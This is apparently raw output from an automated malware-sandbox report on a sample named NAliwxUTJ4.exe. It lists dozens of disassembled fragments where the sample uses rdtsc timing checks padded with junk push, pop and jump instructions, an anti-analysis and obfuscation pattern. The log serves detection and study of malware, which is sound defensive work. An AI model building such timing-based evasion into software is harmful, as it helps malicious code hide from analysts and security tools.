              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64B888 second address: 64B8AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE245h 0x00000007 push edx 0x00000008 jmp 00007FEBD8FBE23Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64B9BE second address: 64B9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64B9CA second address: 64B9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64BAF8 second address: 64BB17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEBD887DA89h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64BB17 second address: 64BB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 650C4D second address: 650C7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA85h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEBD887DA7Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 650C7B second address: 650C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 657218 second address: 657234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEBD887DA83h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 657234 second address: 657238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 657238 second address: 65723C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 65749E second address: 6574A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6574A4 second address: 6574A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6574A8 second address: 6574BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FEBD8FBE236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FEBD8FBE236h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6574BE second address: 6574C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 657776 second address: 65777A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 65777A second address: 65778E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jc 00007FEBD887DA76h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 65778E second address: 65779C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 657AE4 second address: 657AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 657F51 second address: 657F57 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 657F57 second address: 657F8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEBD887DA86h 0x00000008 jmp 00007FEBD887DA7Dh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FEBD887DA7Ah 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 657F8F second address: 657FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FEBD8FBE236h 0x0000000a jmp 00007FEBD8FBE23Eh 0x0000000f jng 00007FEBD8FBE236h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6587E0 second address: 6587E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 658EFC second address: 658F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 658F02 second address: 658F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 658F06 second address: 658F32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE241h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FEBD8FBE245h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 658F32 second address: 658F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 658F38 second address: 658F64 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEBD8FBE236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007FEBD8FBE266h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEBD8FBE248h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 656CF7 second address: 656D09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FEBD887DA7Ch 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 656D09 second address: 656D13 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEBD8FBE23Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 669295 second address: 6692AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEBD887DA7Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6692AE second address: 6692B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6692B2 second address: 6692F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007FEBD887DA7Fh 0x0000000d push ebx 0x0000000e jo 00007FEBD887DA76h 0x00000014 jmp 00007FEBD887DA86h 0x00000019 pop ebx 0x0000001a pushad 0x0000001b jno 00007FEBD887DA76h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 66FA4D second address: 66FA51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 674054 second address: 674076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007FEBD887DA8Dh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 674076 second address: 67407C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 67407C second address: 674080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 674080 second address: 674084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 673A7D second address: 673A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEBD887DA81h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 673A99 second address: 673AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 673C00 second address: 673C17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA83h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 684A1D second address: 684A59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEBD8FBE242h 0x0000000e pop esi 0x0000000f push edx 0x00000010 pushad 0x00000011 ja 00007FEBD8FBE236h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 689244 second address: 68928E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEBD887DA83h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FEBD887DA78h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 jo 00007FEBD887DAA3h 0x0000001a jmp 00007FEBD887DA7Ch 0x0000001f pushad 0x00000020 jmp 00007FEBD887DA7Dh 0x00000025 js 00007FEBD887DA76h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68928E second address: 689294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68EDC7 second address: 68EDE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA7Eh 0x00000007 jmp 00007FEBD887DA7Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68D5FE second address: 68D602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68D602 second address: 68D61E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA88h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68D61E second address: 68D628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop esi 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68DA70 second address: 68DA74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68DA74 second address: 68DA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68DA7A second address: 68DA95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEBD887DA86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68DBCE second address: 68DBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007FEBD8FBE236h 0x00000016 jmp 00007FEBD8FBE23Ah 0x0000001b popad 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 jp 00007FEBD8FBE236h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68DBFB second address: 68DBFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68DBFF second address: 68DC03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68DD85 second address: 68DD89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68EA3E second address: 68EA44 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 692507 second address: 69250B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 69FA63 second address: 69FA69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6B0D1A second address: 6B0D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6C2A38 second address: 6C2A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6C2A3D second address: 6C2A60 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FEBD887DA88h 0x00000008 jmp 00007FEBD887DA82h 0x0000000d push eax 0x0000000e jnc 00007FEBD887DA76h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6C5F14 second address: 6C5F33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jmp 00007FEBD8FBE243h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6C67AA second address: 6C67B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6C67B0 second address: 6C67CC instructions: 0x00000000 rdtsc 0x00000002 jo 00007FEBD8FBE236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FEBD8FBE242h 0x00000010 jc 00007FEBD8FBE236h 0x00000016 jns 00007FEBD8FBE236h 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6C67CC second address: 6C67D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6C67D2 second address: 6C67D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6C67D6 second address: 6C67DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6C67DA second address: 6C67E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6C6AC8 second address: 6C6ACE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6C6ACE second address: 6C6ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FEBD8FBE238h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6C6C6E second address: 6C6C74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6C6C74 second address: 6C6C88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FEBD8FBE236h 0x0000000e ja 00007FEBD8FBE236h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6C6DFF second address: 6C6E48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA88h 0x00000007 jmp 00007FEBD887DA83h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FEBD887DA82h 0x00000015 jo 00007FEBD887DA76h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6C9CF6 second address: 6C9CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6C9CFF second address: 6C9D03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6CC951 second address: 6CC974 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEBD8FBE23Ah 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FEBD8FBE23Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6CC974 second address: 6CC97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B702EA second address: 4B702EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B702EE second address: 4B702F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B702F2 second address: 4B702F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B702F8 second address: 4B70376 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FEBD887DA7Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov edx, 32506594h 0x00000016 mov bx, 4700h 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d mov bl, F6h 0x0000001f mov al, FAh 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FEBD887DA82h 0x0000002d xor si, 6078h 0x00000032 jmp 00007FEBD887DA7Bh 0x00000037 popfd 0x00000038 call 00007FEBD887DA88h 0x0000003d pop eax 0x0000003e popad 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B70376 second address: 4B7037C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B7037C second address: 4B70380 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90665 second address: 4B9068D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEBD8FBE248h 0x00000008 mov edi, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B9068D second address: 4B90692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90692 second address: 4B90763 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE245h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b movzx ecx, bx 0x0000000e pushfd 0x0000000f jmp 00007FEBD8FBE249h 0x00000014 xor ah, 00000016h 0x00000017 jmp 00007FEBD8FBE241h 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, esi 0x0000001f jmp 00007FEBD8FBE23Eh 0x00000024 push eax 0x00000025 jmp 00007FEBD8FBE23Bh 0x0000002a xchg eax, esi 0x0000002b pushad 0x0000002c mov ax, 498Bh 0x00000030 pushfd 0x00000031 jmp 00007FEBD8FBE240h 0x00000036 sbb cx, AD98h 0x0000003b jmp 00007FEBD8FBE23Bh 0x00000040 popfd 0x00000041 popad 0x00000042 lea eax, dword ptr [ebp-04h] 0x00000045 pushad 0x00000046 pushfd 0x00000047 jmp 00007FEBD8FBE244h 0x0000004c xor ax, D7F8h 0x00000051 jmp 00007FEBD8FBE23Bh 0x00000056 popfd 0x00000057 popad 0x00000058 nop 0x00000059 pushad 0x0000005a mov ch, DFh 0x0000005c movsx edx, ax 0x0000005f popad 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 push eax 0x00000065 pop ebx 0x00000066 mov ecx, 0BC066B3h 0x0000006b popad 0x0000006c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90763 second address: 4B90769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B90769 second address: 4B9076D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B9076D second address: 4B907BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FEBD887DA7Dh 0x00000010 add esi, 0DB8ADF6h 0x00000016 jmp 00007FEBD887DA81h 0x0000001b popfd 0x0000001c jmp 00007FEBD887DA80h 0x00000021 popad 0x00000022 push dword ptr [ebp+08h] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FEBD887DA7Ah 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B907BF second address: 4B907C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 4B907C3 second address: 4B907C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
